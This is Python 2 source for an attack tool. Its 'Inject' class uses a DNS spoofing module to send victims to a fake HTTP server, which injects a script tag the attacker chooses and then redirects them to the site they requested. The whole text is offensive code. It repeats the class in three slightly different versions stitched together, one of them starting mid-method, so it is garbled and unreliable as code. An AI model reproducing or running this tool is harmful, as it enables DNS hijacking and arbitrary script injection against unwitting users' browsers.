def __init__(self, host, port, js): self.host = host self.port = port from dnspoisoner import DNSspoof self.dnsspoof = DNSspoof(self.host) if js != None: self.js = js else: try: self.js = raw_input("[+] Enter the script source: ") except KeyboardInterrupt: pass self.response = """ HTTP/1.1 200 OK Date: Thu, 12 Apr 2016 15:25 GMT Server: Apache/2.2.17 (Unix) mod ssl/2.2 17 OpenSSL/0.9.8l DAV/2 Last-Modified: Sat, 28 Aug 2015 22:17:02 GMT ETag: "20e2b8b-3c-48ee99731f380" Accept-Ranges: bytes Content-Lenght: 90 Connection: close Content-Type: text/html <head> <script src= {}></script> </head> """.format(self.js)
def server(self): print "[+] Script Injection initialized." from dnspoisoner import DNSspoof self.dnsspoof = DNSspoof(self.host) self.dnsspoof.start(None,"Inject") server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_address = (self.host, self.port) print '[+] Injection URL - http://{}:{}'.format(self.host,self.port) server.bind(server_address) server.listen(1) for i in range (0,2): if i >= 1: print "[+] Script Injected on: ", client_address domain = self.dnsspoof.getdomain() domain = domain [:-1] print "[+] Target was requesting: {}".format(domain) self.dnsspoof.stop() try: connection,client_address = server.accept() redirect = self.response + """<body> <meta http-equiv="refresh" content="0; URL='http://{}"/> </body>""".format(domain) connection.send("%s" % redirect) connection.shutdown(socket.SHUT_WR | socket.SHUT_RD) connection.close() except KeyboardInterrupt: server.close() try: connection,client_address = server.accept() connection.send("%s" % self.response) connection.shutdown(socket.SHUT_WR | socket.SHUT_RD) connection.close() except KeyboardInterrupt: server.close()
class Inject(object): def __init__(self, host, port, js): if js != None: self.js = js else: try: self.js = raw_input("[+] Enter the script source: ") except KeyboardInterrupt: pass self.response = """ HTTP/1.1 200 OK Date: Thu, 12 Apr 2016 15:25 GMT Server: Apache/2.2.17 (Unix) mod ssl/2.2 17 OpenSSL/0.9.8l DAV/2 Last-Modified: Sat, 28 Aug 2015 22:17:02 GMT ETag: "20e2b8b-3c-48ee99731f380" Accept-Ranges: bytes Content-Lenght: 90 Connection: close Content-Type: text/html <head> <script src= {}></script> </head> """.format(self.js) self.host = host self.port = port def start(self): self.t = threading.Thread(name='Injection', target=self.server) self.t.setDaemon(True) self.t.start def stop(self): try: self.t.stop() print "[-] Script Injection finalized." except Exception as e: print "[!] Exception caught: {}".format(e) def server(self): print "[+] Script Injection initialized." from dnspoisoner import DNSspoof self.dnsspoof = DNSspoof(self.host) self.dnsspoof.start(None,"Inject") server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_address = (self.host, self.port) print '[+] Injection URL - http://{}:{}'.format(self.host,self.port) server.bind(server_address) server.listen(1) for i in range (0,2): if i >= 1: print "[+] Script Injected on: ", client_address domain = self.dnsspoof.getdomain() domain = domain [:-1] print "[+] Target was requesting: {}".format(domain) self.dnsspoof.stop() try: connection,client_address = server.accept() redirect = self.response + """<body> <meta http-equiv="refresh" content="0; URL='http://{}"/> </body>""".format(domain) connection.send("%s" % redirect) connection.shutdown(socket.SHUT_WR | socket.SHUT_RD) connection.close() except KeyboardInterrupt: server.close() try: connection,client_address = server.accept() connection.send("%s" % self.response) connection.shutdown(socket.SHUT_WR | socket.SHUT_RD) connection.close() except KeyboardInterrupt: server.close()
class Inject(object): name = "Injection" desc = "Redirect to page with script then let client go" version = "0.2" ps = "Will need to change the way of injection to netfilter packet injection." def __init__(self, host, port, js): self.host = host self.port = port from dnspoisoner import DNSspoof self.dnsspoof = DNSspoof(self.host) if js != None: self.js = js else: try: self.js = raw_input("[+] Enter the script source: ") except KeyboardInterrupt: pass self.response = """ HTTP/1.1 200 OK Date: Thu, 12 Apr 2016 15:25 GMT Server: Apache/2.2.17 (Unix) mod ssl/2.2 17 OpenSSL/0.9.8l DAV/2 Last-Modified: Sat, 28 Aug 2015 22:17:02 GMT ETag: "20e2b8b-3c-48ee99731f380" Accept-Ranges: bytes Content-Lenght: 90 Connection: close Content-Type: text/html <head> <script src= {}></script> </head> """.format(self.js) def start(self): self.t = threading.Thread(name='Injection', target=self.server) self.t.setDaemon(True) self.t.start def stop(self): try: self.t.stop() print "[-] Script Injection finalized." except Exception as e: print "[!] Exception caught: {}".format(e) def server(self): print "[+] Script Injection initialized." self.dnsspoof.start(None,"Inject") server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_address = (self.host, self.port) print '[+] Injection URL - http://{}:{}'.format(self.host,self.port) server.bind(server_address) server.listen(1) for i in range (0,2): if i >= 1: domain = self.dnsspoof.getdomain() domain = domain [:-1] print "[+] Target was requesting: {}".format(domain) self.dnsspoof.stop() try: connection,client_address = server.accept() redirect = self.response + """<body> <meta http-equiv="refresh" content="0; URL='http://{}"/> </body>""".format(domain) connection.send("%s" % redirect) print "[+] Script Injected on: ", client_address connection.shutdown(socket.SHUT_WR | socket.SHUT_RD) connection.close() except KeyboardInterrupt: server.close() try: connection,client_address = server.accept() connection.send("%s" % self.response) connection.shutdown(socket.SHUT_WR | socket.SHUT_RD) connection.close() except KeyboardInterrupt: server.close()